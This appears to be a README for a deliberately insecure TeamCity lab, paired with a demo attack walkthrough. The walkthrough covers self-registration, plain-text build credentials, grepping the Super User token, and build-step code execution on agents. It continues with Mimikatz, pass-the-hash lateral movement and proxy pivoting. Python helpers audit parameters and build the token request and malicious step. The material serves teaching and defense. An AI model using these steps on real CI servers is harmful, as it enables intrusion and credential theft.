d0n601 / PwnCity

PwnCity

An insecurely configured TeamCity continuous integration environment.
Work in progress: deployment code coming soon (eventually).

Demo

There may be more than one path through PwnCity, but this is the one I'll be presenting on Feb 24th at the OWASP Sacramento Chapter meeting.
Note: Operational security is largely ignored here since this is a demo.

Initial Access

  1. Scan the IP to discover SSH and TeamCity: nmap -Pn -p- 52.234.0.18.
    • Note: The host won't respond to ICMP, so a plain nmap 52.234.0.18 reports it as down; -Pn skips host discovery.
    • Note: If you only scan nmap's default top 1000 TCP ports (nmap -Pn 52.234.0.18), you miss TeamCity on 8111; scan the full range with -p-.
  2. Browse to the TeamCity URL http://52.234.0.18:8111.
  3. Self-registration is enabled, so navigate to http://52.234.0.18:8111/registerUser.html and create a new user bob with password bobhacks?.
  4. As bob, navigate to Projects > SimpleMavenSample > Build > Settings.
    • See that Parameters contains credentials stored as plain text, so any user who can view the build configuration can read them (password-typed parameters would have been masked).
  5. Check whether the credentials are reused for SSH: ssh dev@168.62.29.0. They are, so SSH in as the low-privileged dev user.
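The credential leak in step 4 is the kind of thing worth checking across every build configuration, not just the one you happened to click on. The following Python audit is an added example written for this page (not code from the PwnCity repo): it parses a build configuration's parameter list in the shape TeamCity's REST API returns from /app/rest/buildTypes/<id>/parameters and reports credential-looking parameters stored as plain text. The XML sample is constructed to match that shape; the <type rawValue="password"/> marking, the REST paths in the comments and the SECRET_NAME_RE name heuristic are assumptions to verify against your server. The point it shows is the difference between a plain-text parameter, which any user with view rights reads exactly as bob did, and a password-typed one, whose value TeamCity masks in the UI, build logs and API.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample (not a capture from the lab) in the shape of
# GET /app/rest/buildTypes/<id>/parameters. The first two parameters are plain
# text; the third is a password-typed parameter, whose value the server omits.
SAMPLE_PARAMETERS_XML = """\
<properties count="3">
  <property name="env.SSH_USER" value="dev"/>
  <property name="env.SSH_PASSWORD" value="Roblerino1995"/>
  <property name="env.DEPLOY_TOKEN" value="">
    <type rawValue="password"/>
  </property>
</properties>
"""

# Heuristic for credential-like parameter names; tune it for your naming scheme.
SECRET_NAME_RE = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key|credential", re.I)


def is_masked(prop):
    """True if the parameter carries TeamCity's password type (assumed to be
    serialized as <type rawValue="password ..."/>), i.e. its value is hidden."""
    type_el = prop.find("type")
    return type_el is not None and (type_el.get("rawValue") or "").startswith("password")


def audit_parameters(xml_text):
    """Return (name, value) pairs for credential-looking parameters stored as
    plain text: what bob saw on the Parameters tab of SimpleMavenSample."""
    findings = []
    for prop in ET.fromstring(xml_text).iter("property"):
        name = prop.get("name", "")
        value = prop.get("value", "")
        if SECRET_NAME_RE.search(name) and value and not is_masked(prop):
            findings.append((name, value))
    return findings


def password_parameter_xml(name, value):
    """Hardened form of the same parameter: the password type makes TeamCity
    mask the value in the UI, build logs and API responses. Assumed REST shape
    for PUT /app/rest/buildTypes/<id>/parameters/<name>; verify before use."""
    prop = ET.Element("property", {"name": name, "value": value})
    ET.SubElement(prop, "type", {"rawValue": "password"})
    return ET.tostring(prop, encoding="unicode")


if __name__ == "__main__":
    for name, value in audit_parameters(SAMPLE_PARAMETERS_XML):
        print(f"plain-text credential parameter: {name} = {value}")
        print("  fix:", password_parameter_xml(name, value))
```

Run it against the real API output for each build type (fetch with the bob account to see exactly what an unprivileged user sees) and treat every finding as a credential that must be rotated, not just re-typed as a password parameter: the value has already been readable to everyone with project view access.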

From the Foothold

We could tunnel from our initial foothold. Knowing that RDP is open on two build agents, we could attempt to authenticate with the creds we've found... but that's not as fun.

  1. Explore the TeamCity server a bit and look for the Super User token, which TeamCity writes to its server log at startup: grep "Super user" /home/dev/TeamCity/TeamCity/logs/teamcity-server.log.
  2. Now log in as the Super User (leave the username blank and use the token as the password)!
  3. Create a new project PwnAgent via Administration > Projects > Create project, and get a shell on the build agents by adding a Command Line build step.
  4. Edit the build step so that it executes "Always, even if build stop command was issued", and set the following:
    • Command executable: cmd.exe
    • Command parameters: /c %system.teamcity.build.checkoutDir%/launcher.bat
    • Once you see how these work, you understand how code execution works here, and can modify it to do what you like.
    • Alternatively, you can avoid using files in the repo altogether and leave that blank: all the code can be shoved into a build step.
  5. Select the ... next to Run on the menu, and then the agent you're targeting. If all goes well you'll have an agent call back.
  6. Run a port scan via the powershell/situational_awareness/network/portscan module. Discover that 10.0.0.7 has 3389, 445, 139 and 135 open.
  7. Run Mimikatz to dump logon credentials and get bruno's password.
  8. Run powershell/lateral_movement/invoke_smbexec to get an agent on Bruno-PC via bruno's NTLM hash.
  9. Loot Bruno's PC.
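Two parts of the foothold are worth seeing as code: pulling the Super User token out of teamcity-server.log and authenticating with it (step 1 and 2), and the build step that turns a project admin into code execution on an agent (steps 3 to 5). The Python below is an added example written for this page, not code from the PwnCity repo. The log excerpt is constructed; the timestamp and logger prefix vary by version, so only the "Super user authentication token:" phrase is relied on. The REST details are assumptions to verify against your server: that HTTP Basic with an empty username and the token as password is accepted, that the Command Line runner's type id is simpleRunner, and that command.executable, command.parameters and teamcity.step.mode=execute_always are its property names. Nothing here touches the network; the request is built but not sent.

```python
import base64
import re
import urllib.request
import xml.etree.ElementTree as ET

# Constructed teamcity-server.log excerpt (not a capture from the lab). Each
# server start logs a fresh token, so the last match is the one that is valid.
SAMPLE_SERVER_LOG = """\
[2021-02-20 10:01:12,003]   INFO - jetbrains.buildServer.SERVER - TeamCity server is starting
[2021-02-20 10:01:15,517]   INFO - jetbrains.buildServer.SERVER - Super user authentication token: 5831074612092155987 (use empty username with the token as the password to access the server)
[2021-02-20 10:01:16,002]   INFO - jetbrains.buildServer.SERVER - TeamCity server started
"""

TOKEN_RE = re.compile(r"Super user authentication token:\s*(\d+)")


def extract_super_user_tokens(log_text):
    """All tokens found in the log, oldest first; [-1] is the current one."""
    return TOKEN_RE.findall(log_text)


def super_user_request(base_url, token, path="/app/rest/server"):
    """Build (but do not send) a REST request as the Super User: HTTP Basic
    with an empty username and the token as the password (assumed to be
    accepted by the REST API the same way the login form accepts it)."""
    creds = base64.b64encode(f":{token}".encode()).decode()
    req = urllib.request.Request(base_url.rstrip("/") + path)
    req.add_header("Authorization", f"Basic {creds}")
    req.add_header("Accept", "application/xml")
    return req


def command_line_step_xml(name, executable, parameters, execute_always=True):
    """Serialize the build step from the walkthrough in the assumed shape of
    POST /app/rest/buildTypes/<id>/steps. The runner type id and the property
    names are assumptions; compare with a GET of an existing step first."""
    step = ET.Element("step", {"name": name, "type": "simpleRunner"})
    props = ET.SubElement(step, "properties")
    for key, value in (
        ("command.executable", executable),
        ("command.parameters", parameters),
        # "execute_always" is the assumed REST spelling of the UI option
        # "Always, even if build stop command was issued".
        ("teamcity.step.mode", "execute_always" if execute_always else "default"),
    ):
        ET.SubElement(props, "property", {"name": key, "value": value})
    return ET.tostring(step, encoding="unicode")


if __name__ == "__main__":
    token = extract_super_user_tokens(SAMPLE_SERVER_LOG)[-1]
    req = super_user_request("http://52.234.0.18:8111", token)
    print(req.full_url, req.get_header("Authorization"))
    print(command_line_step_xml("launcher", "cmd.exe",
                                "/c %system.teamcity.build.checkoutDir%/launcher.bat"))
```

The defensive reading of the same code: anyone who can read teamcity-server.log (here, the dev user whose password was sitting in a build parameter) is one grep away from full server administration, and any project administrator can run arbitrary commands as the agent service account, so log file permissions and the set of people who can edit build steps are both part of the server's trust boundary.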

Attack Infrastructure

  • Kali Linux: VM on operator machine.
  • Ubuntu 20.04 LTS: Empire server

PwnCity Lab

  • Ubuntu 20.04 TeamCity
  • Windows 10: BuildAgent01
  • Windows 7: BuildAgent02
  • Windows 10: Bruno-PC

Creds

Credentials chosen from rockyou.txt.

  • bruno:AMOTEbruno84 (Windows)
  • dev:Roblerino1995 (Windows/Linux)
  • admin:aut0magic (TeamCity)

To Do

  1. Deploy with Terraform.
  2. Install things with Ansible.
  3. CLI variable to tune defenses up or down (kind of like a difficulty level)
  4. TBD

Defenses

Endpoint Security

PwnAgent01 has Microsoft Defender enabled. Although it's certainly still possible to defeat this, the malicious build step we demonstrated is blocked there.

Administrative Notes

This section is just a collection of snippets that were useful when administering the lab environment.

RDP into Windows Hosts

  1. From Kali, open a dynamic (SOCKS) port forward through the TeamCity host to reach the internal network: ssh -D 9050 dev@52.234.0.18.
  2. RDP through it with proxychains: proxychains4 xfreerdp /u:dev /v:10.0.0.6:3389.

References

  1. TeamCity Hardening Guide
  2. TeamCity SuperUser
  3. Pentest TeamCity
  4. PwnCity Build Agent
